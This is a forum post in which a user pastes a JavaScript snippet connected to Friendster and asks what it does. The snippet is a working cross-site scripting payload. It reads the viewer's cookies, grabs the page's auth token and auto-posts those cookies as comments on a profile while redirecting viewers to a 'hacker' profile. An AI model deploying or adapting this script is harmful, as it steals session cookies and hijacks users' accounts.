I dont know where to post this but it involves friendster so i just posted
it here..

[i]help..............[/i]
[b]what this script mean?[/b]
[spoiler]alert(1);
(function(){
un='hacker';
win=window;
lh=(loc=location).hostname;
oi=pageOwnerID;
vi=pageViewerID;
dm='http://www.friendster.com';
cAUTH='';
rComm=[];
rComm[rComm.length]=''+document.cookie+'';
rComm[rComm.length]=''+document.cookie+'';
rComm[rComm.length]=''+document.cookie+'';
rComm[rComm.length]=''+document.cookie+'';
rComm[rComm.length]=''+document.cookie+'';
if(!!vi||(vi.indexOf('')<0)){
if(lh.indexOf('profiles.friendster')>-1){
win.loc.href=[dm,'/setlang.php?lang=en-US&updatelang=1&next=',encodeURIComponent([dm,'/profiles/',un].join('')),'&cookie=1'].join('');
}else{
caUTH=function(d){
var c,f;
c=/authcode"\s*value="([\da-z]*?)"/;
f=new RegExp(c).exec(d);
cAUTH=f?f[1]:'';
try{
return c;
}finally{
c=null;
}
};
autoComment=function(){
var a,b,c,d,e,f;
try{
f=Math.floor(Math.random()*rComm.length);
a=win.XMLHttpRequest?new XMLHttpRequest():new ActiveXObject('MSXML2.XMLHTTP');
e=1000-rComm.length;
b=['&authcode=',cAUTH,'&postaction=submit&inputcount=',e,'&comment=',encodeURIComponent(rComm[f])].join('');
c='application/x-www-form-urlencoded'+('UTF-8'?';charset='+'UTF-8':'');
d=b?b.length:0;
a.open('POST',['/comments.php?uid=',oi].join(''),true);
a.setRequestHeader('Content-type',c);
a.setRequestHeader('Content-length',d);
if(a.overrideMimeType&&(navigator.userAgent.match(/Gecko\/(\d{4})/)||[0,2005])[1]<2005){
a.setRequestHeader('Connection','close');
}
a.send(b);
}finally{
a=null;
}
};
if(vi.indexOf(oi)<0){
sendXMLHttpRequestText(['/comments.php?uid=',oi].join(''),'caUTH');
win.addEvent('domready',autoComment);
}
}
}else if(!vi){
win.loc.href=[dm,'/login.php?next=',encodeURIComponent(dm,'/setlang.php?lang=en-US&updatelang=1'),'&next=',encodeURIComponent([dm,'/profiles/',un].join('')),'&cookie=1'].join('');
}
})();[/spoiler]
It is just confusing cause i found [b]"hacker"[/b] on the code..
[align=center]

[/align]